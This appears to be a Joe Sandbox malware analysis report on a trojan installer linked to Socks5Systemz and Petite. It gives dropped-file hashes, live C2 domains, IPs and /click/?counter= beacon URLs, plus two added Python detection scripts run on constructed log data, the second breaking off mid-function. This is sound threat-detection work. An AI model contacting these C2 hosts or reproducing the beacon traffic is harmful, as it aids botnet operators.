C:\Program Files (x86)\CRTGame\bin\x86\is-FGLVG.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-G7PIK.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-HAM7K.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmp | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-HS78I.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmp | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-KANF7.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmp | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-KPUSQ.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-ML5PH.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-NG6SA.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-NH7NT.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-OF8TE.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-OJ8GN.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-OMMAA.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmp | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-PIVQ2.tmp | 0% | ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
bwiesit.com | 0% | Avira URL Cloud | safe
http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde2 | 0% | Avira URL Cloud | safe
https://mp4v2.googlecode.com/svnrepository | 0% | Avira URL Cloud | safe
http://bwiesit.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945cea4de0a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cadb5cbb22 | 0% | Avira URL Cloud | safe
http://www.mp3dev.org/ID3Error | 0% | Avira URL Cloud | safe
https://mp4v2.googlecode.com/svn/trunk | 0% | Avira URL Cloud | safe
https://mp4v2.googlecode.com/svn/trunkrepository | 0% | Avira URL Cloud | safe
http://www.mpg123.de | 0% | Avira URL Cloud | safe
http://bwiesit.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca | 0% | Avira URL Cloud | safe
http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde2 | 0% | Avira URL Cloud | safe
http://lame.sf.net | 0% | Avira URL Cloud | safe
http://mingw-w64.sourceforge.net/X | 0% | Avira URL Cloud | safe
http://LosslessAudio.org/0 | 0% | Avira URL Cloud | safe
http://lame.sf.net32bits | 0% | Avira URL Cloud | safe
https://mp4v2.googlecode.com/svn | 0% | Avira URL Cloud | safe
http://ocsps.ssl.com0Q | 0% | Avira URL Cloud | safe
http://www.mp3dev.org/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bwiesit.com | 94.232.249.187 | true | true | - | unknown

Name | Malicious | Antivirus Detection | Reputation
bwiesit.com | true | Avira URL Cloud: safe | unknown
http://bwiesit.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945cea4de0a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cadb5cbb22 | true | Avira URL Cloud: safe | unknown
http://bwiesit.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | 6hvZpn91O8.tmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.dr | false | - | high
https://gcc.gnu.org/bugs/): | is-73F5N.tmp.1.dr | false | - | high
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0 | is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | false | - | high
https://mp4v2.googlecode.com/svn/trunk | is-BJBAO.tmp.1.dr | false | Avira URL Cloud: safe | unknown
https://sectigo.com/CPS0 | is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | false | - | high
http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde2 | crtgame.exe, 00000006.00000002.2940328851.00000000036D2000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.000000000089F000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.0000000000867000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.00000000008C1000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.0000000000840000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.sectigo.com0 | is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | false | - | high
http://www.mp3dev.org/ID3Error | is-HAM7K.tmp.1.dr | false | Avira URL Cloud: safe | unknown
https://mp4v2.googlecode.com/svnrepository | is-BJBAO.tmp.1.dr | false | Avira URL Cloud: safe | unknown
http://ocsps.ssl.com0 | is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | false | - | high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | false | - | high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | false | - | high
http://www.mpg123.de | is-QECHS.tmp.1.dr | false | Avira URL Cloud: safe | unknown
https://mp4v2.googlecode.com/svn/trunkrepository | is-BJBAO.tmp.1.dr | false | Avira URL Cloud: safe | unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0 | is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | false | - | high
http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde2 | crtgame.exe, 00000006.00000002.2938924611.00000000008C1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/psU | 6hvZpn91O8.exe, 00000000.00000003.1677333051.0000000002148000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.exe, 00000000.00000003.1677127078.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.dr | false | - | high
http://lame.sf.net | is-HAM7K.tmp.1.dr | false | Avira URL Cloud: safe | unknown
https://streams.videolan.org/upload/ | is-S02KC.tmp.1.dr | false | - | high
http://mingw-w64.sourceforge.net/X | is-2CGLR.tmp.1.dr | false | Avira URL Cloud: safe | unknown
https://www.ssl.com/repository0 | is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | false | - | high
http://LosslessAudio.org/0 | is-RNIE1.tmp.1.dr | false | Avira URL Cloud: safe | unknown
http://lame.sf.net32bits | is-HAM7K.tmp.1.dr | false | Avira URL Cloud: safe | unknown
http://www.mp3dev.org/ | is-HAM7K.tmp.1.dr | false | Avira URL Cloud: safe | unknown
http://code.google.com/p/mp4v2D | is-BJBAO.tmp.1.dr | false | - | high
http://www.remobjects.com/ps | 6hvZpn91O8.exe, 00000000.00000003.1677333051.0000000002148000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.exe, 00000000.00000003.1677127078.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.tmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.dr | false | - | high
https://mp4v2.googlecode.com/svn | is-BJBAO.tmp.1.dr | false | Avira URL Cloud: safe | unknown
http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0 | is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | false | - | high
http://ocsps.ssl.com0Q | is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | false | Avira URL Cloud: safe | unknown
http://www.sqlite.org/copyright.html. | is-G7PIK.tmp.1.dr | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.225.74 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
94.232.249.187 | bwiesit.com | Syrian Arab Republic | 29256 | INT-PDN-STE-ASSTEPDNInternalASSY | true
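The behaviour graph and the URL and IP tables above give a small set of network indicators for this sample: the domain bwiesit.com, the IPs 94.232.249.187 and 46.8.225.74, the non-HTTP endpoint 46.8.225.74:2023, and the /click/?counter=<hex> beacon path recovered from crtgame.exe memory. The script below, an added example that is not part of the Joe Sandbox report or of the sample, turns those indicators into matching logic and runs it over proxy log lines. The log lines and their "<time> <src_ip> <dst_ip>:<dst_port> <method> <url>" layout are constructed for the example, and the 32-hex-character minimum for the counter value is an assumption chosen to match the values in the tables without over-fitting to one of them.

```python
"""Match the network indicators from this report against proxy and
connection log lines.

Added example: not part of the Joe Sandbox report or of the sample. The
indicator values (domain, IPs, port, /click/?counter= path) are taken from the
behaviour graph and URL/IP tables; the log lines and their format are
constructed for the example and are an assumption.
"""
import ipaddress
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the report.
C2_DOMAINS = {"bwiesit.com"}
C2_IPS = {ipaddress.ip_address("94.232.249.187"), ipaddress.ip_address("46.8.225.74")}
C2_ENDPOINTS = {(ipaddress.ip_address("46.8.225.74"), 2023)}  # non-HTTP channel in the graph
# Beacon seen in crtgame.exe memory: /click/?counter=<long lowercase hex blob>.
CLICK_PATH = re.compile(r"^/click/?$")
HEX_BLOB = re.compile(r"^[0-9a-f]{32,}$")  # minimum length is an assumption


def classify_url(url: str) -> List[str]:
    """Reasons a requested URL matches the report's indicators (empty if none)."""
    reasons: List[str] = []
    parts = urlsplit(url)
    host = parts.hostname or ""
    if host.lower() in C2_DOMAINS:
        reasons.append(f"known C2 domain {host}")
    try:
        if ipaddress.ip_address(host) in C2_IPS:
            reasons.append(f"known C2 IP {host}")
    except ValueError:
        pass  # hostname, not an IP literal
    counter = parse_qs(parts.query).get("counter", [""])[0]
    if CLICK_PATH.match(parts.path) and HEX_BLOB.match(counter):
        reasons.append("/click/?counter=<hex> beacon pattern")
    return reasons


def classify_endpoint(dst_ip: str, dst_port: int) -> List[str]:
    """Reasons a destination ip:port matches the report's indicators."""
    reasons: List[str] = []
    try:
        ip = ipaddress.ip_address(dst_ip)
    except ValueError:
        return reasons
    if ip in C2_IPS:
        reasons.append(f"known C2 IP {ip}")
    if (ip, dst_port) in C2_ENDPOINTS:
        reasons.append(f"known C2 endpoint {ip}:{dst_port}")
    return reasons


def scan_log(lines: List[str]) -> Dict[int, List[str]]:
    """Map 1-based line numbers to the reasons that line was flagged."""
    hits: Dict[int, List[str]] = {}
    for no, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 5:
            continue
        dst_ip, _, dst_port = fields[2].rpartition(":")
        reasons = classify_endpoint(dst_ip, int(dst_port) if dst_port.isdigit() else -1)
        reasons += [r for r in classify_url(fields[4]) if r not in reasons]
        if reasons:
            hits[no] = reasons
    return hits


# Constructed log lines (not from the report): two beacons, one raw C2
# connection, one benign request to a TEST-NET address.
SAMPLE_LOG = [
    "21:07:40 10.0.0.15 94.232.249.187:80 GET http://bwiesit.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde2",
    "21:07:41 10.0.0.15 94.232.249.187:80 GET http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde2",
    "21:07:45 10.0.0.15 46.8.225.74:2023 CONNECT tcp://46.8.225.74:2023",
    "21:08:02 10.0.0.15 203.0.113.10:443 GET https://www.example.com/",
]

if __name__ == "__main__":
    for no, reasons in scan_log(SAMPLE_LOG).items():
        print(f"line {no}: {'; '.join(reasons)}")
```

The endpoint check is kept separate from the URL check because the 46.8.225.74:2023 channel in the graph is not an HTTP request and would never appear as a URL; a proxy or firewall export that carries destination addresses is enough to catch it. Note that Avira URL Cloud rates the beacon URLs above as "safe", so the /click/?counter= path pattern, not the URL reputation, is what carries the detection.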
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1575009
                                                    Start date and time:2024-12-14 03:06:09 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 6m 46s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:6hvZpn91O8.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:1015b0b5cfddfbc4baea6910d9c56c3c.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@16/128@1/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 95%
                                                    • Number of executed functions: 174
                                                    • Number of non-executed functions: 243
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe
                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
21:07:38 | API Interceptor | 547884x Sleep call for process: crtgame.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
46.8.225.74 | j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz
94.232.249.187 | j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz
                                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
    j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
    b3astmode.arm5.elf | malicious | Mirai | 109.248.108.147
    reduce.exe | malicious | GO Backdoor | 46.8.236.61
    InsertSr.exe | malicious | GO Backdoor | 46.8.236.61
    iKhdG3bwZK.exe | malicious | GO Backdoor | 46.8.236.61
    ppc.elf | malicious | Mirai | 46.8.228.104
    file.exe | malicious | Cryptbot | 46.8.237.112
    file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 46.8.237.112
    file.exe | malicious | Clipboard Hijacker, Cryptbot | 46.8.237.112
    Week11.exe | malicious | GO Backdoor | 46.8.236.61
INT-PDN-STE-ASSTEPDNInternalASSY
    j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz | 94.232.249.187
    jade.arm.elf | malicious | Mirai | 31.9.99.97
    jade.ppc.elf | malicious | Mirai | 95.212.143.36
    jade.x86.elf | malicious | Mirai | 31.14.164.17
    Josho.ppc.elf | malicious | Unknown | 95.212.143.56
    la.bot.mips.elf | malicious | Mirai | 178.171.212.67
    home.mips.elf | malicious | Gafgyt, Mirai | 188.247.2.172
    home.m68k.elf | malicious | Gafgyt, Mirai | 46.57.220.121
    f5TWdT5EAc.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig | 77.44.150.37
    teste.arm5.elf | malicious | Gafgyt, Mirai, Moobot, Okiru | 46.213.226.219
                                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)
    j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz
    SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe | malicious | Unknown
    SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe | malicious | Unknown
    SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe | malicious | Unknown
    SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe | malicious | Unknown
    SecuriteInfo.com.Win32.Malware-gen.371.3693.exe | malicious | Unknown
    SecuriteInfo.com.Win32.Malware-gen.371.3693.exe | malicious | Unknown
    SecuriteInfo.com.Win32.Malware-gen.18181.11360.exe | malicious | Unknown
    SecuriteInfo.com.Win32.Malware-gen.18181.11360.exe | malicious | Unknown
    SecuriteInfo.com.Trojan.GenericKD.72075407.22055.29849.exe | malicious | Unknown
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):337408
                                                                            Entropy (8bit):6.515131904432587
                                                                            Encrypted:false
                                                                            SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                            MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                            SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                            SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                            SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
• Filename: j9htknb7BQ.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.18181.11360.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.18181.11360.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.GenericKD.72075407.22055.29849.exe, Detection: malicious
                                                                            Reputation:high, very likely benign file
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):26526
                                                                            Entropy (8bit):4.600837395607617
                                                                            Encrypted:false
                                                                            SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                            MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                            SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                            SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                            SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                            Malicious:false
                                                                            Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):214016
                                                                            Entropy (8bit):6.676457645865373
                                                                            Encrypted:false
                                                                            SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                            MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                            SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                            SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                            SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):266254
                                                                            Entropy (8bit):6.343813822604148
                                                                            Encrypted:false
                                                                            SSDEEP:3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
                                                                            MD5:8B099FA7B51A8462683BD6FF5224A2DC
                                                                            SHA1:C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
                                                                            SHA-256:438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
                                                                            SHA-512:9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):906766
                                                                            Entropy (8bit):6.450201653594769
                                                                            Encrypted:false
                                                                            SSDEEP:24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
                                                                            MD5:AF785965AB0BF2474B3DD6E53DA2F368
                                                                            SHA1:EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
                                                                            SHA-256:8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
                                                                            SHA-512:5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..|;.......<..................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):127669
                                                                            Entropy (8bit):7.952352167575405
                                                                            Encrypted:false
                                                                            SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                            MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                            SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                            SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                            SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...
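Several of the DLLs dropped by the Inno Setup temp stub above show a section literally named "petite" in their PE header and an 8-bit entropy close to the 7.95 maximum, yet ReversingLabs scores them at only 0-3%. The script below is an added example, not part of the Joe Sandbox report or its tooling, showing how an analyst can reproduce the report's "Entropy (8bit)" figure and check a dropped file for the Petite section name and for nameless sections. The build_sample_pe helper, the 7.5 entropy threshold and the sample buffer it feeds into triage() are constructed for this demonstration and are not real dropped files.

```python
import math
import struct
from collections import Counter

# Fixed offsets from the PE/COFF layout: e_lfanew sits at 0x3C in the DOS header,
# the 20-byte COFF file header follows the "PE\0\0" signature, and the 40-byte
# section headers follow the optional header.
DOS_E_LFANEW_OFFSET = 0x3C
PE_SIGNATURE = b"PE\0\0"
COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0); the sandbox's 'Entropy (8bit)' is this measure."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_section_names(data: bytes) -> list:
    """Return the section names of a PE image, or [] if the buffer is not a parsable PE."""
    if len(data) < DOS_E_LFANEW_OFFSET + 4 or data[:2] != b"MZ":
        return []
    (e_lfanew,) = struct.unpack_from("<I", data, DOS_E_LFANEW_OFFSET)
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        return []
    coff = e_lfanew + 4
    if len(data) < coff + COFF_HEADER_SIZE:
        return []
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
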